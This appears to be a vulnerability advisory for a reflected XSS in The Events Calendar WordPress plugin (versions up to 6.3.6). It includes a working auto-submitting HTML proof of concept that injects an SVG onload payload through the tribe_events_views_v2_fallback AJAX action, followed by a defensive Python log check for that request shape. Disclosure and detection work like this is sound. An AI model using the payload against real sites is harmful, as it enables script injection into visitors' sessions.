Description: The plugin does not properly sanitize user-submitted content when rendering some views via AJAX.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>The Events Calendar <= 6.3.6 - Reflected XSS</title>
</head>
<body onload="document.getElementById('autoSubmitForm').submit();">
<form id="autoSubmitForm" action="http://vulnerablesite.tld/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tribe_events_views_v2_fallback">
<input type="hidden" name="view" value="reflector">
<input type="hidden" name="view_data[lala]" value="<svg onload=alert(document.domain);></svg>">
</form>
</body>
</html>
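A defender-side check for the request shape in the proof of concept above, as an added example that is not part of the original advisory or of the plugin's code: it flags logged POST bodies sent to `admin-ajax.php` with the `tribe_events_views_v2_fallback` action whose `view_data[...]` values decode to markup. The function name, the markup heuristic and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Endpoint and action name as they appear in the proof of concept on this page.
AJAX_PATH = "/wp-admin/admin-ajax.php"
FALLBACK_ACTION = "tribe_events_views_v2_fallback"

# Heuristic (assumption): a tag opener or an inline event-handler attribute.
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]|\bon[a-z]+\s*=", re.IGNORECASE)


def suspicious_view_data(path: str, body: str) -> list[str]:
    """Return the view_data[...] keys whose decoded value looks like markup.

    `body` is an application/x-www-form-urlencoded POST body as captured by a
    proxy or WAF. Requests that are not the fallback action return [].
    """
    if not path.split("?", 1)[0].endswith(AJAX_PATH):
        return []
    # parse_qsl percent-decodes both names and values (one decoding pass only).
    params = parse_qsl(body, keep_blank_values=True)
    if ("action", FALLBACK_ACTION) not in params:
        return []
    return [key for key, value in params
            if key.startswith("view_data[") and MARKUP.search(value)]


# Constructed sample requests (not real traffic). The first mirrors the form
# on this page; the "month" view, "slug" key and "other_action" are made up.
SAMPLES = [
    ("/wp-admin/admin-ajax.php",
     "action=tribe_events_views_v2_fallback&view=reflector"
     "&view_data%5Blala%5D=%3Csvg+onload%3Dalert%28document.domain%29%3B%3E%3C%2Fsvg%3E"),
    ("/wp-admin/admin-ajax.php",
     "action=tribe_events_views_v2_fallback&view=month&view_data%5Bslug%5D=month"),
    ("/wp-admin/admin-ajax.php",
     "action=other_action&view_data%5Bx%5D=%3Cb%3E"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, suspicious_view_data(path, body))
```

A hit is a triage signal for log review, not proof of exploitation; the plugin version still has to be checked against the affected range in the title (<= 6.3.6).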